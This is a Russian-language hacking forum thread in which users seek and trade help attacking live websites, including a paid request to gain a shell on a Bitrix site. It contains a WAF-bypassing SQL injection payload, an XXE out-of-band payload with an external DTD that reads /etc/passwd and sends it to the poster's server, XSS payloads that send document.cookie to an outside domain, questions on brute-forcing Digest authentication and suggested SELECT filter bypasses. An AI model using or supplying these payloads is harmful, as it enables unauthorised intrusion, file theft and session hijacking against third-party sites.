Старый 01.01.2017, 17:36   #3581
HAH4TAKo
 
Регистрация: 01.01.2017
Сообщений: 2
Репутация: 0
По умолчанию

Здравствуйте друзья, прошу помощи есть сайт один, на bitrixe, но там WAF режет FROM полностью, обойти не как не получается, присутствует так же XSS но с запроса:
+and+1=0e0union+/*!12345select*/+(0x3120616e6420313d30),concat_ws(0x3a,user(),vers ion(),database()),0x3c7363726970743e616c6572742864 6f63756d656e742e636f6f6b6569293c2f7363726970743e,0 x272b2d2d2b,5,0x272b2d2d2b,0x272b2d2d2b,0x272b2d2d 2b,9

Есть так же доступ в админку сайта, но аккаунт там менеджера, нет возможности редактировать шаблон и т.д.
Кто поможет как нибудь залится, напишите в пм пожалуйста, по деньгам не обижу.
HAH4TAKo вне форума   Ответить с цитированием
Старый 05.01.2017, 05:45   #3582
mikhailtpm
 
Аватар для mikhailtpm
 
Регистрация: 01.07.2015
Сообщений: 67
Репутация: 0
По умолчанию

Подскажите по XXE в SAML-е
Делаю запрос:


Код:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://мойсайт.ru/evil1.dtd"> %e1;%foo;%dtd;]><saml2p:AuthnRequest xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" AssertionConsumerServiceURL="http://мойсайт.ru?1" Destination="http://мойсайт.ru?2" ID="_2c57c7cb4e686d41499550471ee77e08" IssueInstant="2017-01-05T02:33:48.670Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0"><saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">http://мойсайт.ru?3;</saml2:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/><ds:Reference URI="#_2c57c7cb4e686d41499550471ee77e08"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><ec:InclusiveNamespaces xmlns:ec="http://www.w3.org/2001/10/xml-exc-c14n#" PrefixList="ds saml2 saml2p"/></ds:Transform></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>66XlhMacOnMKrK921FWmzKfLwYY=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>tV+Jq2vU5MQ8D37iS+LlZqKRU4pBNcI+wzdn9IpofCdr1zN45MBVGVQ2qhH1es9edA3rVWRbc4FtsfFFLpgV4io86LbQVXlhT0CBaXWUBTphbadWZx89SKVzZvKDzD4GMgijELEGX/PE12uBWgL8CjKJ0KYWDGQB8FMWomU3/rg4k7dn0N/HE2FW95z7XcDTqhqQ2ruwU3E3zo3TGMJwggdrN/7AKSD6MuX6fnDRmVqtppqqrd0Vi6Hyi8osg+uMkk/WmcIRR9Jwx6jKNIFBl+TVxnj0I+iceThs77koAvkvuQVWhKQtK3KHwHyzGhDKDLRj2DqoOjCovRGJ8TPPnA==</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIIDjzCCAncCBFBOTRkwDQYJKoZIhvcNAQEFBQAwgYsxCzAJBgNVBAYTAlVTMRcwFQYDVQQIDA5Ob3J0aCBDYXJvbGluYTESMBAGA1UEBwwJQ2hhcmxvdHRlMRowGAYDVQQKDBFUaW1lIFdhcm5lciBDYWJsZTEMMAoGA1UECwwDVFNHMSUwIwYDVQQDDBx3YXlmYXJlci50aW1ld2FybmVyY2FibGUuY29tMB4XDTEyMDkxMDIwMjcwNVoXDTM2MDkwNDIwMjcwNVowgYsxCzAJBgNVBAYTAlVTMRcwFQYDVQQIDA5Ob3J0aCBDYXJvbGluYTESMBAGA1UEBwwJQ2hhcmxvdHRlMRowGAYDVQQKDBFUaW1lIFdhcm5lciBDYWJsZTEMMAoGA1UECwwDVFNHMSUwIwYDVQQDDBx3YXlmYXJlci50aW1ld2FybmVyY2FibGUuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1+HefR47qyui1u/yDCdZytqlvNOSXQAkFGV6opEk4AoAF0UPq6yldbAnvLMWyjaSAE/Sj/zNNtMtCa9rdHQ5ig4Inx039kuqqkXdsfY2/4NIZD44+ZDQea5+91r7mW0dxW2skUxZdQj4IdwueO1crB2P8gJeEDbpb7h1P/QKKMr9j7fpOBlRCgMvETbNojqyVVrQC5s/lYR98254R2f9g77vEQ0A4yvCjflRojLMRujnWkd8CZFICdSUCsFlAgKTUg3w97hAY3qDLKJXr17SmGWbU2gT6Cta2FCMcAPnfQPsD8peWd8JkiEhc70dY1X5LtOITtFqwR+8Px4a/IpMnwIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQCBmZMbXMjaLhPEKJmjSO++WL3UaXfWbtmcM0X8mDT41r8izfLLpXxBOTcxbA8V/X/lm9gSHi5YvZqmuqqBuZ5jniZabDziyC9cvrczG4xcUHoPqjWez0GHiZXEAleKA0puha5U1Voo8OtACh3if7aYBv8hxGLkCgnz6ImQXx2R/mlnJIF6ZcWQNfevXXUmSTpKT9/jkDd5nVv9iDRpXd8KoOhPRnANJR52WsoR4/We4Nu2/bQf0RNcsH7FEsP0M5kYOiF+oXf70koWWTpmnkIm0UTalT9M2KSDtcxCvuEfSEKTNQWKUqE2S4ERLBz7Q4ZIHlQefIXWTlk/wAOwTX67</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml2p:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/><saml2p:RequestedAuthnContext Comparison="exact"><saml2:AuthnContextDeclRef xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">secure/uri</saml2:AuthnContextDeclRef></saml2p:RequestedAuthnContext></saml2p:AuthnRequest>
В файле evil1.dtd находится
Код:
<!ENTITY % p1 SYSTEM "file:///etc/passwd"><!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://мойсайт.ru/?%p1;'>">%p2;

В логах приходит

ip серва - - [05/Jan/2017:05:38:06 +0300] "GET /evil1.dtd HTTP/1.1" 200 110 "-" "Java/1.7.0_72" "-"

Но почему-то не отсылает содержание etc/passwd, делает только запрос как вы видите к evil1.dtd
Что не так?

Последний раз редактировалось mikhailtpm; 05.01.2017 в 05:53..
mikhailtpm вне форума   Ответить с цитированием
Старый 05.01.2017, 13:05   #3583
S00pY
 
Аватар для S00pY
 
Регистрация: 06.07.2010
Сообщений: 39
Репутация: 35
По умолчанию

Цитата:
Сообщение от mikhailtpm Посмотреть сообщение
Подскажите по XXE в SAML-е
Делаю запрос:


Код:
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [ <!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % dtd SYSTEM "http://мойсайт.ru/evil1.dtd"> %e1;%foo;%dtd;]><saml2p:AuthnRequest xmlns:saml2p="urn:oasis:names:tc:SAML:2.0:protocol" AssertionConsumerServiceURL="http://мойсайт.ru?1" Destination="http://мойсайт.ru?2" ID="_2c57c7cb4e686d41499550471ee77e08" IssueInstant="2017-01-05T02:33:48.670Z" ProtocolBinding="urn:oasis:names:tc:SAML:2.0:bindings:HTTP-POST" Version="2.0"><saml2:Issuer xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">http://мойсайт.ru?3;</saml2:Issuer><ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"><ds:SignedInfo><ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/><ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/><ds:Reference URI="#_2c57c7cb4e686d41499550471ee77e08"><ds:Transforms><ds:Transform Algorithm="http://www.w3.org/2000/09/xmldsig#enveloped-signature"/><ds:Transform Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"><ec:InclusiveNamespaces xmlns:ec="http://www.w3.org/2001/10/xml-exc-c14n#" PrefixList="ds saml2 saml2p"/></ds:Transform></ds:Transforms><ds:DigestMethod Algorithm="http://www.w3.org/2000/09/xmldsig#sha1"/><ds:DigestValue>66XlhMacOnMKrK921FWmzKfLwYY=</ds:DigestValue></ds:Reference></ds:SignedInfo><ds:SignatureValue>tV+Jq2vU5MQ8D37iS+LlZqKRU4pBNcI+wzdn9IpofCdr1zN45MBVGVQ2qhH1es9edA3rVWRbc4FtsfFFLpgV4io86LbQVXlhT0CBaXWUBTphbadWZx89SKVzZvKDzD4GMgijELEGX/PE12uBWgL8CjKJ0KYWDGQB8FMWomU3/rg4k7dn0N/HE2FW95z7XcDTqhqQ2ruwU3E3zo3TGMJwggdrN/7AKSD6MuX6fnDRmVqtppqqrd0Vi6Hyi8osg+uMkk/WmcIRR9Jwx6jKNIFBl+TVxnj0I+iceThs77koAvkvuQVWhKQtK3KHwHyzGhDKDLRj2DqoOjCovRGJ8TPPnA==</ds:SignatureValue><ds:KeyInfo><ds:X509Data><ds:X509Certificate>MIIDjzCCAncCBFBOTRkwDQYJKoZIhvcNAQEFBQAwgYsxCzAJBgNVBAYTAlVTMRcwFQYDVQQIDA5Ob3J0aCBDYXJvbGluYTESMBAGA1UEBwwJQ2hhcmxvdHRlMRowGAYDVQQKDBFUaW1lIFdhcm5lciBDYWJsZTEMMAoGA1UECwwDVFNHMSUwIwYDVQQDDBx3YXlmYXJlci50aW1ld2FybmVyY2FibGUuY29tMB4XDTEyMDkxMDIwMjcwNVoXDTM2MDkwNDIwMjcwNVowgYsxCzAJBgNVBAYTAlVTMRcwFQYDVQQIDA5Ob3J0aCBDYXJvbGluYTESMBAGA1UEBwwJQ2hhcmxvdHRlMRowGAYDVQQKDBFUaW1lIFdhcm5lciBDYWJsZTEMMAoGA1UECwwDVFNHMSUwIwYDVQQDDBx3YXlmYXJlci50aW1ld2FybmVyY2FibGUuY29tMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1+HefR47qyui1u/yDCdZytqlvNOSXQAkFGV6opEk4AoAF0UPq6yldbAnvLMWyjaSAE/Sj/zNNtMtCa9rdHQ5ig4Inx039kuqqkXdsfY2/4NIZD44+ZDQea5+91r7mW0dxW2skUxZdQj4IdwueO1crB2P8gJeEDbpb7h1P/QKKMr9j7fpOBlRCgMvETbNojqyVVrQC5s/lYR98254R2f9g77vEQ0A4yvCjflRojLMRujnWkd8CZFICdSUCsFlAgKTUg3w97hAY3qDLKJXr17SmGWbU2gT6Cta2FCMcAPnfQPsD8peWd8JkiEhc70dY1X5LtOITtFqwR+8Px4a/IpMnwIDAQABMA0GCSqGSIb3DQEBBQUAA4IBAQCBmZMbXMjaLhPEKJmjSO++WL3UaXfWbtmcM0X8mDT41r8izfLLpXxBOTcxbA8V/X/lm9gSHi5YvZqmuqqBuZ5jniZabDziyC9cvrczG4xcUHoPqjWez0GHiZXEAleKA0puha5U1Voo8OtACh3if7aYBv8hxGLkCgnz6ImQXx2R/mlnJIF6ZcWQNfevXXUmSTpKT9/jkDd5nVv9iDRpXd8KoOhPRnANJR52WsoR4/We4Nu2/bQf0RNcsH7FEsP0M5kYOiF+oXf70koWWTpmnkIm0UTalT9M2KSDtcxCvuEfSEKTNQWKUqE2S4ERLBz7Q4ZIHlQefIXWTlk/wAOwTX67</ds:X509Certificate></ds:X509Data></ds:KeyInfo></ds:Signature><saml2p:NameIDPolicy AllowCreate="true" Format="urn:oasis:names:tc:SAML:2.0:nameid-format:transient"/><saml2p:RequestedAuthnContext Comparison="exact"><saml2:AuthnContextDeclRef xmlns:saml2="urn:oasis:names:tc:SAML:2.0:assertion">secure/uri</saml2:AuthnContextDeclRef></saml2p:RequestedAuthnContext></saml2p:AuthnRequest>
В файле evil1.dtd находится
Код:
<!ENTITY % p1 SYSTEM "file:///etc/passwd"><!ENTITY % p2 "<!ENTITY e1 SYSTEM 'https://мойсайт.ru/?%p1;'>">%p2;

В логах приходит

ip серва - - [05/Jan/2017:05:38:06 +0300] "GET /evil1.dtd HTTP/1.1" 200 110 "-" "Java/1.7.0_72" "-"

Но почему-то не отсылает содержание etc/passwd, делает только запрос как вы видите к evil1.dtd
Что не так?
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
S00pY вне форума   Ответить с цитированием
Старый 31.01.2017, 04:13   #3584
mikhailtpm
 
Аватар для mikhailtpm
 
Регистрация: 01.07.2015
Сообщений: 67
Репутация: 0
По умолчанию

Кто чем брутит субдомены?

Использую dnsenum(бывают ошибки)
и Sublist3r(слишком медленный)
Может у кого есть тулзы получше?
mikhailtpm вне форума   Ответить с цитированием
Старый 31.01.2017, 05:11   #3585
Faaax
 
Аватар для Faaax
 
Регистрация: 03.04.2012
Сообщений: 95
Репутация: 6
По умолчанию

nmap,knockpy.py u subfinder tyt ectb niushi
Faaax вне форума   Ответить с цитированием
Старый 02.02.2017, 03:54   #3586
Марк Эльва
 
Регистрация: 28.12.2015
Сообщений: 6
Репутация: -1
По умолчанию

XSS.
Задача обойти фильтр.
Пропускает исключительно <img>

Сайт №1.

Отправляю:
Код:
<img src="/" onerror="javascript:img = new Image(); img.src = "https://domen.com/1.gif?"+document.cookie;"></img>
Получаю:
Код:
<img src="/" onerror="javascript:img = new Image(); img.src = " https:="" domen.com="" 1.gif?"="" document.cookie;"="">
Сайт №2

Отправляю:
Код:
<img onload="var s = document.createElement('script'); s.src='https://domen.com/1';  />
Получаю
Код:
<img src="https://domen.com/1">
Марк Эльва вне форума   Ответить с цитированием
Старый 02.02.2017, 20:06   #3587
mikhailtpm
 
Аватар для mikhailtpm
 
Регистрация: 01.07.2015
Сообщений: 67
Репутация: 0
По умолчанию

Попробуй разные векторы https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
mikhailtpm вне форума   Ответить с цитированием
Старый 14.02.2017, 12:54   #3588
mikhailtpm
 
Аватар для mikhailtpm
 
Регистрация: 01.07.2015
Сообщений: 67
Репутация: 0
По умолчанию

Кто-нибудь знает, как брутить Digest Authorization?


Исходный запрос выглядет так



GET /sc/ HTTP/1.1
Host: www.site.com
Authorization: Digest username="sa", realm="Restricted area-2013", nonce="58a2ced303f51", uri="/sc/", response="3310939ca5c45758381d6f56bb47f39c", opaque="010e8d7fc68b7c54a6b3606fcc994a80", qop=auth, nc=00000001, cnonce="8bb24bd6eed03e38"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.37 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.6,en;q=0.4
Cookie:
Connection: close
mikhailtpm вне форума   Ответить с цитированием
Старый 20.02.2017, 06:23   #3589
mikhailtpm
 
Аватар для mikhailtpm
 
Регистрация: 01.07.2015
Сообщений: 67
Репутация: 0
По умолчанию

Есть mysql inj
WAF блокирует слово SELECT в моем запросе, пробовал по-разному писать, но что-то не выходит..
PHP код:
14445%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7171627a71%2C%28CASE%20WHEN%20%28QUARTER%28NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%2C0x7176627671%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
Как-то можно заменить SELECT? Пробовал разные варианты SELECT-a, но никак( Набросайте пару рабочих вариантов, пожалуйста.
mikhailtpm вне форума   Ответить с цитированием
Старый 22.02.2017, 19:20   #3590
BigBear
 
Регистрация: 26.07.2012
Сообщений: 134
Репутация: 51
По умолчанию

Цитата:
Сообщение от mikhailtpm Посмотреть сообщение
Есть mysql inj
WAF блокирует слово SELECT в моем запросе, пробовал по-разному писать, но что-то не выходит..
PHP код:
14445%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CCONCAT%280x7171627a71%2C%28CASE%20WHEN%20%28QUARTER%28NULL%29%20IS%20NULL%29%20THEN%201%20ELSE%200%20END%29%2C0x7176627671%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 
Как-то можно заменить SELECT? Пробовал разные варианты SELECT-a, но никак( Набросайте пару рабочих вариантов, пожалуйста.
select-1,2,3,etc
select~1,2,3,etc
select(1),2,3,etc
__________________
Первый VPN на основе Эллиптической криптографии. Телепортируйся в любой момент, будь невидимым с multi-vpn.biz
И да, это реклама. Просто очень нужен VPN.
BigBear вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2021, Jelsoft Enterprises Ltd. Перевод: zCarot